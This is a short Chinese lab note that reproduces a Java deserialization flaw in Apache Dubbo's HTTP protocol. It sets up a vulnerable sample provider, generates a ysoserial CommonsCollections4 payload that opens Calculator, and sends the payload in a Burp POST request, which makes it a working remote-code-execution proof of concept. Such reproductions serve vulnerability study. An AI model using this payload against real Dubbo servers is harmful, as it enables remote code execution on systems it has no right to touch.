环境搭建
下载zookeeper:
https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz
安装zookeeper,修改zoo.cfg,然后启动在2181端口。
git clone https://github.com/apache/dubbo-samples
cd dubbo-samples/java/dubbo-samples-http
vi pom.xml # 将默认的2.7.5修改为之前版本比如2.7.1
mvn clean package
mvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java
要调试的话改成
mvnDebug -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java
Demo
使用ysoserial生成payload,然后倒入到burp中,作为POST请求的内容:
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser
如果classpath没有gadget,需要手动指定到classpath中。
/Library/Java/JavaVirtualMachines/jdk1.8.0_112.jdk/Contents/Home/bin/java -classpath /usr/local/Cellar/maven/3.6.1/libexec/boot/plexus-classworlds-2.6.0.jar:/Users/caiqiqi/Downloads/commons-collections4-4.0.jar -Dclassworlds.conf=/usr/local/Cellar/maven/3.6.1/libexec/bin/m2.conf -Dmaven.home=/usr/local/Cellar/maven/3.6.1/libexec -Dlibrary.jansi.path=/usr/local/Cellar/maven/3.6.1/libexec/lib/jansi-native -Dmaven.multiModuleProjectDirectory=/Users/caiqiqi/GitProjects/dubbo-samples/java org.codehaus.plexus.classworlds.launcher.Launcher -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java
burp发送以下请求:
POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host: cqq.com:8080
<ysoserial生成的payload>
视频演示:
Dubboo
参考
- https://mp.weixin.qq.com/s/pHnhHMNArAiZPVGR1btZIg
- https://mp.weixin.qq.com/s/reQaUVCa6RNG9tG_IZ_UjA
- https://www.cnkirito.moe/dubbo-http-protocol/
- https://www.mail-archive.com/[email protected]/msg06225.html
